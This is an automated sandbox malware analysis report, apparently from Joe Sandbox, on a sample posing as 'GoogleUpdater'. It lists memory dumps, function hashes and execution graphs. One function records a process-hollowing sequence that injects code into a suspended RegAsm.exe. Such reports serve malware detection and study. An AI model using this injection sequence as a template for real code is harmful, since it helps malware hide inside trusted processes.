                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e5b5a619e1e41257ff61bb9ce61973a967a38b3c54904a035053de9adbd46bb5
                                                                                                                                                                                                                                            • Instruction ID: a37745100b708654b4b455b91aed101f4483c77f2245d52799ba8197e7d84ea0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5b5a619e1e41257ff61bb9ce61973a967a38b3c54904a035053de9adbd46bb5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEC02B2072104D09C340D1744703F1EC1DE4BC0300F0000031502E32A0D52189404129
                                                                                                                                                                                                                                            Function 06861479 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3740cdea7470a585fe73034a17374eed29a51bd050eb1d378ad6c5422ef29291
                                                                                                                                                                                                                                            • Instruction ID: 9ed72e95ad1c990f8d8ec34fbffad57b3b9f5e23aba8329d8c51374d673f4ee1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3740cdea7470a585fe73034a17374eed29a51bd050eb1d378ad6c5422ef29291
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66C09B61A1014D4BDB40D685C752FAEB2795748304F90C0197645FB781DB3D59078B36
                                                                                                                                                                                                                                            Function 06860EB5 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 283b4c1715988a607de929073b8777946e0c06b1089f1fd8b82e54def7a05a93
                                                                                                                                                                                                                                            • Instruction ID: ebcf667e511d457c18c1cff73e71f6a0a93e8812a1c06fbe384b00400b17c73e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 283b4c1715988a607de929073b8777946e0c06b1089f1fd8b82e54def7a05a93
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BB0121071014D5BDB84D38D8302F6ED1EEDBD4204F9490163086E7341DD168C024B22
                                                                                                                                                                                                                                            Function 0686305C Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4649523779.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6860000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6c5140298e6d4dc44c67163c932ae6ab7a3554f0d02def703158c24ec81601ce
                                                                                                                                                                                                                                            • Instruction ID: 4148deb615ddde18261d2945c05b253baa337cae29a58a09f85feda939a4bb99
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c5140298e6d4dc44c67163c932ae6ab7a3554f0d02def703158c24ec81601ce
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8990022500505541DA09AB10D46659D9220FE805507D45254848A5D5504924591D9544

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:22.6%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:30%
                                                                                                                                                                                                                                            Total number of Nodes:20
                                                                                                                                                                                                                                            Total number of Limit Nodes:0

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 02B52205 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B52177,02B52167), ref: 02B52374
                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02B52387
                                                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(000003A8,00000000), ref: 02B523A5
                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(000003AC,?,02B521BB,00000004,00000000), ref: 02B523C9
                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(000003AC,?,?,00003000,00000040), ref: 02B523F4
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(000003AC,00000000,?,?,00000000,?), ref: 02B5244C
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(000003AC,00400000,?,?,00000000,?,00000028), ref: 02B52497
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(000003AC,?,?,00000004,00000000), ref: 02B524D5
                                                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(000003A8,05110000), ref: 02B52511
                                                                                                                                                                                                                                            • ResumeThread.KERNELBASE(000003A8), ref: 02B52520
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2204689921.0000000002B52000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B52000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_2b52000_f98ae5e6665140c7bc7a10ef5c598fcb.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                            • API String ID: 2687962208-1257834847
                                                                                                                                                                                                                                            • Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                            • Instruction ID: 11dc1e31febd2507e06c8b4a56ff0701476687c4a29bf3ba7e369e5a5e268a92
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CB1D47664128AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA418B94
                                                                                                                                                                                                                                            Function 013214D8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 134 13214d8-132156d VirtualProtectEx 137 1321574-1321595 134->137 138 132156f 134->138 138->137
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01321560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2204579555.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1320000_f98ae5e6665140c7bc7a10ef5c598fcb.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                            • Opcode ID: 28d98b507ccdcee640bd38326d6e007a5228abf463230fd9567b12eb61199231
                                                                                                                                                                                                                                            • Instruction ID: d272d1cb9960e9bb33d83bbfd37c2ac54ed052b57535f059f473932d7d0afa64
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28d98b507ccdcee640bd38326d6e007a5228abf463230fd9567b12eb61199231
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F62102B5D00259DFDB10DFAAD981AEEFBF0FF48310F60842AE519A7250C7359905CBA1
                                                                                                                                                                                                                                            Function 013214E0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 13214e0-132156d VirtualProtectEx 144 1321574-1321595 141->144 145 132156f 141->145 145->144
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 01321560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2204579555.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1320000_f98ae5e6665140c7bc7a10ef5c598fcb.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                                                            • Opcode ID: 3c2a586c61b1a6aa7954513031e25eb82b1c923e7c430468cecdcefac53e3cb9
                                                                                                                                                                                                                                            • Instruction ID: 038b8a5f6b0bb76556230c949d7ed0b0c0b5484829dfb49966577a70225e706a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c2a586c61b1a6aa7954513031e25eb82b1c923e7c430468cecdcefac53e3cb9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31210FB1C00249DFDB10DFAAC981ADEFBF4FF48310F10842AEA19A7250C775A904CBA5
                                                                                                                                                                                                                                            Function 00F2D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 252 f2d005-f2d03d 253 f2d03f-f2d04a 252->253 254 f2d08d-f2d095 252->254 255 f2d082-f2d089 253->255 256 f2d04c-f2d05a 253->256 254->253 255->256 260 f2d08b 255->260 259 f2d060 256->259 261 f2d063-f2d06b 259->261 260->261 262 f2d07b-f2d080 261->262 263 f2d06d-f2d075 261->263 262->263 263->262
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2204108272.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_f2d000_f98ae5e6665140c7bc7a10ef5c598fcb.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 357965ce47dcd91cd87765665e8883df3fa4db4890f5e05c5fe7e2cac301383e
                                                                                                                                                                                                                                            • Instruction ID: 50a59fe195a5eab7ff55f58302005cf52c7c0b7562017e92f21c4ad710aa00d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 357965ce47dcd91cd87765665e8883df3fa4db4890f5e05c5fe7e2cac301383e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB014C6140E3D09EE7128B259894B52BFB4AF53224F1980DBD9888F1E7C2695C49C772
                                                                                                                                                                                                                                            Function 00F2D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 265 f2d01d-f2d03d 266 f2d03f-f2d04a 265->266 267 f2d08d-f2d095 265->267 268 f2d082-f2d089 266->268 269 f2d04c-f2d05a 266->269 267->266 268->269 273 f2d08b 268->273 272 f2d060 269->272 274 f2d063-f2d06b 272->274 273->274 275 f2d07b-f2d080 274->275 276 f2d06d-f2d075 274->276 275->276 276->275
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2204108272.0000000000F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F2D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_f2d000_f98ae5e6665140c7bc7a10ef5c598fcb.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: afda99bfc505b6adbd5cba33d3f52b5138fc21ad645d14e308ca6010c6af2609
                                                                                                                                                                                                                                            • Instruction ID: a5d9c384943f3a89d5f3fef9acf79b4ad968baba99e6b18c5c7b9cafc90d3b46
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afda99bfc505b6adbd5cba33d3f52b5138fc21ad645d14e308ca6010c6af2609
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5501F271804350EAE710CE25E880B66FF98EF42334F18C41AED484A29AC3799845D6B2

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:12.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:3.5%
                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                            Total number of Limit Nodes:69
                                                                                                                                                                                                                                            execution_graph 57379 410b00 57382 417140 57379->57382 57381 410b0f 57383 417158 57382->57383 57385 4171ac error_info_injector 57383->57385 57386 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 57383->57386 57385->57381 57386->57385 57387 42ce20 GetUserGeoID 57388 42ce4e _memcpy_s 57387->57388 57389 4263e0 57390 4263fd 57389->57390 57455 423900 57390->57455 57392 426485 57393 423900 67 API calls 57392->57393 57394 426529 57393->57394 57395 423900 67 API calls 57394->57395 57396 4265cd 57395->57396 57397 423900 67 API calls 57396->57397 57398 426671 57397->57398 57399 423900 67 API calls 57398->57399 57400 426714 57399->57400 57401 423900 67 API calls 57400->57401 57402 4267dc 57401->57402 57403 423900 67 API calls 57402->57403 57404 4268a4 57403->57404 57405 423900 67 API calls 57404->57405 57406 42696c 57405->57406 57407 423900 67 API calls 57406->57407 57408 426a34 57407->57408 57409 423900 67 API calls 57408->57409 57410 426afc 57409->57410 57411 423900 67 API calls 57410->57411 57412 426bc4 57411->57412 57413 423900 67 API calls 57412->57413 57414 426c8c 57413->57414 57415 423900 67 API calls 57414->57415 57416 426d54 57415->57416 57417 423900 67 API calls 57416->57417 57418 426e1c 57417->57418 57419 423900 67 API calls 57418->57419 57420 426ee4 57419->57420 57421 423900 67 API calls 57420->57421 57422 426fac 57421->57422 57423 423900 67 API calls 57422->57423 57424 427146 57423->57424 57425 423900 67 API calls 57424->57425 57428 427211 57425->57428 57426 423900 67 API calls 57427 42754f 57426->57427 57429 423900 67 API calls 57427->57429 57428->57426 57432 42761a 57429->57432 57430 423900 67 API calls 57431 42794c 57430->57431 57433 423900 67 API calls 57431->57433 57432->57430 57434 427a14 57433->57434 57435 423900 67 API calls 57434->57435 57436 427adc 57435->57436 57437 423900 67 API calls 57436->57437 57438 427ba4 57437->57438 57439 423900 67 API calls 57438->57439 57440 427c6c 57439->57440 57441 423900 67 API calls 57440->57441 57442 427d34 57441->57442 57443 423900 67 API calls 57442->57443 57444 427dfc 57443->57444 57445 423900 67 API calls 57444->57445 57446 427ec4 57445->57446 57456 423938 Concurrency::wait __vswprintf_s_l 57455->57456 57661 41a1e0 57456->57661 57458 4239cd 57459 423a1e 57458->57459 57667 414e70 57458->57667 57461 423aaf 57459->57461 57671 4ee3c0 46 API calls 57459->57671 57462 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57461->57462 57468 423aba __aulldiv _memcpy_s __vswprintf_s_l 57462->57468 57464 423a64 57672 4172e0 46 API calls ctype 57464->57672 57466 423ac0 57466->57392 57468->57466 57673 553db1 44 API calls 2 library calls 57468->57673 57469 424359 57471 424449 57469->57471 57674 53e35a AcquireSRWLockExclusive 57469->57674 57477 4244c6 57471->57477 57681 4f4970 46 API calls 57471->57681 57472 4244d2 lstrcpyA 57473 4244f9 57472->57473 57480 424530 57472->57480 57475 53e35a 3 API calls 57473->57475 57485 424503 _Error_objects 57475->57485 57476 42441c _Error_objects 57476->57471 57679 53e28a 46 API calls _Error_objects 57476->57679 57477->57472 57479 42443c 57680 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 57479->57680 57481 4245ad 57480->57481 57684 4f4970 46 API calls 57480->57684 57484 424625 lstrcatA 57481->57484 57489 424668 Concurrency::wait 57484->57489 57485->57480 57682 53e28a 46 API calls _Error_objects 57485->57682 57487 424523 57683 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 57487->57683 57490 41a1e0 std::ios_base::clear 46 API calls 57489->57490 57491 4246b3 57490->57491 57492 424704 57491->57492 57493 414e70 std::ios_base::clear 46 API calls 57491->57493 57494 424795 57492->57494 57685 4ee3c0 46 API calls 57492->57685 57493->57492 57495 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57494->57495 57497 4247a0 GetModuleHandleA 57495->57497 57499 4247c6 57497->57499 57503 4247fd 57497->57503 57498 42474a 57686 4172e0 46 API calls ctype 57498->57686 57500 53e35a 3 API calls 57499->57500 57509 4247d0 _Error_objects 57500->57509 57507 42487a 57503->57507 57689 4f4970 46 API calls 57503->57689 57505 42489f 57510 4248ec 57505->57510 57513 53e35a 3 API calls 57505->57513 57506 42488c 57690 54e05e 57506->57690 57507->57505 57507->57506 57509->57503 57687 53e28a 46 API calls _Error_objects 57509->57687 57517 42497f Concurrency::wait 57510->57517 57695 4f4970 46 API calls 57510->57695 57511 424895 57511->57466 57518 4248bf _Error_objects 57513->57518 57515 4247f0 57688 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 57515->57688 57522 41a1e0 std::ios_base::clear 46 API calls 57517->57522 57518->57510 57693 53e28a 46 API calls _Error_objects 57518->57693 57520 4248df 57694 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 57520->57694 57523 4249ed 57522->57523 57524 414e70 std::ios_base::clear 46 API calls 57523->57524 57525 424a3e 57523->57525 57524->57525 57526 424acf 57525->57526 57696 4ee3c0 46 API calls 57525->57696 57527 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57526->57527 57531 424ada 57527->57531 57529 424a84 57697 4172e0 46 API calls ctype 57529->57697 57532 424b81 57531->57532 57533 424b69 57531->57533 57534 424bcf 57532->57534 57536 53e35a 3 API calls 57532->57536 57535 423900 64 API calls 57533->57535 57543 424c62 __vswprintf_s_l 57534->57543 57700 4f4970 46 API calls 57534->57700 57538 424b76 Concurrency::wait 57535->57538 57539 424ba2 _Error_objects 57536->57539 57541 41a1e0 std::ios_base::clear 46 API calls 57538->57541 57539->57534 57698 53e28a 46 API calls _Error_objects 57539->57698 57547 424d5a 57541->57547 57542 424bc2 57699 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 57542->57699 57701 554a21 53 API calls 2 library calls 57543->57701 57546 424cd9 57548 423900 64 API calls 57546->57548 57549 424dab 57547->57549 57550 414e70 std::ios_base::clear 46 API calls 57547->57550 57548->57538 57551 424e3c 57549->57551 57702 4ee3c0 46 API calls 57549->57702 57550->57549 57553 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57551->57553 57555 424e47 57553->57555 57554 424df1 57703 4172e0 46 API calls ctype 57554->57703 57556 54e05e ___std_exception_copy 14 API calls 57555->57556 57556->57511 57662 41a1f7 std::ios_base::clear 57661->57662 57664 41a201 std::ios_base::clear 57662->57664 57704 40dc90 45 API calls std::ios_base::clear 57662->57704 57666 41a214 ctype 57664->57666 57705 41c380 57664->57705 57666->57458 57668 414e97 57667->57668 57744 417380 57668->57744 57670 414ecd 57670->57459 57671->57464 57672->57461 57673->57469 57678 53e36e 57674->57678 57675 53e373 ReleaseSRWLockExclusive 57675->57476 57678->57675 57749 53e3a9 SleepConditionVariableSRW 57678->57749 57679->57479 57680->57471 57681->57477 57682->57487 57683->57480 57684->57481 57685->57498 57686->57494 57687->57515 57688->57503 57689->57507 57750 55a5ce 57690->57750 57693->57520 57694->57510 57695->57517 57696->57529 57697->57526 57698->57542 57699->57534 57700->57543 57701->57546 57702->57554 57703->57551 57704->57664 57706 41c3b9 57705->57706 57707 41c3a8 57705->57707 57709 41c3b1 57706->57709 57719 53e01e 57706->57719 57711 41d950 57707->57711 57709->57666 57712 41d967 57711->57712 57713 41d96c 57711->57713 57730 40db60 RaiseException Concurrency::cancel_current_task 57712->57730 57714 53e01e std::_Facet_Register 17 API calls 57713->57714 57717 41d975 57714->57717 57718 41d990 57717->57718 57731 55304c 43 API calls 2 library calls 57717->57731 57718->57709 57721 53e023 57719->57721 57722 53e03d 57721->57722 57725 53e03f std::_Facet_Register 57721->57725 57732 54e079 57721->57732 57739 554a6f EnterCriticalSection LeaveCriticalSection std::_Facet_Register 57721->57739 57722->57709 57724 53e625 Concurrency::cancel_current_task 57741 540b81 RaiseException 57724->57741 57725->57724 57740 540b81 RaiseException 57725->57740 57727 53e642 IsProcessorFeaturePresent 57729 53e667 57727->57729 57729->57709 57730->57713 57737 55a608 __dosmaperr 57732->57737 57733 55a646 57743 54e121 14 API calls __dosmaperr 57733->57743 57735 55a631 RtlAllocateHeap 57736 55a644 57735->57736 57735->57737 57736->57721 57737->57733 57737->57735 57742 554a6f EnterCriticalSection LeaveCriticalSection std::_Facet_Register 57737->57742 57739->57721 57740->57724 57741->57727 57742->57737 57743->57736 57745 41741c 57744->57745 57747 4173a0 ctype 57744->57747 57748 41a980 46 API calls 5 library calls 57745->57748 57747->57670 57748->57747 57749->57678 57751 55a5d9 RtlFreeHeap 57750->57751 57755 54e076 57750->57755 57752 55a5ee GetLastError 57751->57752 57751->57755 57753 55a5fb __dosmaperr 57752->57753 57756 54e121 14 API calls __dosmaperr 57753->57756 57755->57511 57756->57755 57782 42bb80 57783 42bbce __aulldiv __vswprintf_s_l 57782->57783 57784 42be3a 57783->57784 57786 42bcf0 Concurrency::wait 57783->57786 57808 414fd0 57784->57808 57787 41a1e0 std::ios_base::clear 46 API calls 57786->57787 57788 42bdc1 57787->57788 57799 4f3620 57788->57799 57790 42bddb 57791 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57790->57791 57792 42bde9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 57791->57792 57803 42b840 57792->57803 57794 42bdfa Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 57795 42be1b Concurrency::wait 57794->57795 57796 42be17 CreateDirectoryA 57794->57796 57797 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57795->57797 57796->57795 57798 42be35 57797->57798 57800 4f3635 57799->57800 57800->57800 57812 4f7b50 57800->57812 57802 4f3663 Concurrency::wait 57802->57790 57804 42b852 57803->57804 57807 42b87e __aulldiv __vswprintf_s_l 57803->57807 57805 42b885 GetFileAttributesA 57804->57805 57804->57807 57806 42b8a2 GetLastError 57805->57806 57805->57807 57806->57807 57807->57794 57809 41501e 57808->57809 57809->57809 57810 41a1e0 std::ios_base::clear 46 API calls 57809->57810 57811 415049 57810->57811 57811->57798 57813 4f7b6a 57812->57813 57815 4f7b6f 57812->57815 57818 418520 45 API calls 57813->57818 57817 4f7ba2 ctype 57815->57817 57819 4ff030 46 API calls 5 library calls 57815->57819 57817->57802 57818->57815 57819->57817 57820 436ca0 57821 436ce3 Concurrency::wait 57820->57821 57822 41a1e0 std::ios_base::clear 46 API calls 57821->57822 57823 436d43 Concurrency::wait 57822->57823 57823->57823 57824 41a1e0 std::ios_base::clear 46 API calls 57823->57824 57825 436db4 Concurrency::wait 57824->57825 57826 4373fa Concurrency::wait 57825->57826 57827 41a1e0 std::ios_base::clear 46 API calls 57825->57827 57826->57826 57828 41a1e0 std::ios_base::clear 46 API calls 57826->57828 57829 436e4b 57827->57829 57830 43769b 57828->57830 57832 53e01e std::_Facet_Register 17 API calls 57829->57832 57831 53e01e std::_Facet_Register 17 API calls 57830->57831 57833 4376a5 Concurrency::wait 57831->57833 57834 436e55 Concurrency::wait 57832->57834 57836 4f4e30 46 API calls 57833->57836 58080 4f4e30 57834->58080 57838 43776f Concurrency::wait 57836->57838 57837 436f1f Concurrency::wait 57837->57837 57840 41a1e0 std::ios_base::clear 46 API calls 57837->57840 57838->57838 57839 41a1e0 std::ios_base::clear 46 API calls 57838->57839 57841 4377e9 57839->57841 57843 436f9f Concurrency::wait 57840->57843 58138 4187e0 57841->58138 57847 41a1e0 std::ios_base::clear 46 API calls 57843->57847 57845 508d80 70 API calls 57846 4378c6 57845->57846 57848 438a4e 57846->57848 58149 4f39a0 59 API calls 57846->58149 57850 4370ea 57847->57850 57849 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57848->57849 57856 438a59 57849->57856 58086 508d80 57850->58086 57854 4373ef 57857 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57854->57857 57855 438a2f 58169 4f0610 46 API calls 3 library calls 57855->58169 57859 438c97 57856->57859 57866 438cbe Concurrency::wait 57856->57866 57857->57826 57861 438cab 57859->57861 57862 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57859->57862 57863 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57861->57863 57862->57861 58019 438cb6 57863->58019 57864 437911 57864->57855 58150 4f37b0 46 API calls 3 library calls 57864->58150 57865 4373d0 58148 4f0610 46 API calls 3 library calls 57865->58148 57866->57866 57869 41a1e0 std::ios_base::clear 46 API calls 57866->57869 57871 438d36 57869->57871 57870 437144 57870->57865 58145 4f37b0 46 API calls 3 library calls 57870->58145 57872 53e01e std::_Facet_Register 17 API calls 57871->57872 57876 438d40 Concurrency::wait 57872->57876 57873 437a3c 57873->57855 58151 4f37b0 46 API calls 3 library calls 57873->58151 57878 4f4e30 46 API calls 57876->57878 57877 437246 57877->57865 58146 4f37b0 46 API calls 3 library calls 57877->58146 57882 438e07 Concurrency::wait 57878->57882 57880 437b3e 58152 4f37b0 46 API calls 3 library calls 57880->58152 57882->57882 57884 41a1e0 std::ios_base::clear 46 API calls 57882->57884 57883 43731f Concurrency::wait 57889 438e81 57884->57889 57885 437e8b 58156 4f37b0 46 API calls 3 library calls 57885->58156 57886 437c12 57886->57885 58153 4f37b0 46 API calls 3 library calls 57886->58153 57895 4187e0 46 API calls 57889->57895 57896 438f4c 57895->57896 57898 508d80 70 API calls 57896->57898 57897 437f57 58157 4f37b0 46 API calls 3 library calls 57897->58157 57900 438f5e 57898->57900 57899 437d14 58154 4f37b0 46 API calls 3 library calls 57899->58154 57902 439983 57900->57902 58170 4f39a0 59 API calls 57900->58170 57904 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57902->57904 57910 43998e 57904->57910 57906 43802b 58158 4f37b0 46 API calls 3 library calls 57906->58158 57908 437de8 Concurrency::wait 58155 506060 46 API calls __Getctype 57908->58155 57909 439964 58184 4f0610 46 API calls 3 library calls 57909->58184 57911 439bf3 57910->57911 57912 439bcc 57910->57912 57916 414fd0 std::ios_base::clear 46 API calls 57911->57916 57915 439be0 57912->57915 57918 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57912->57918 57919 417140 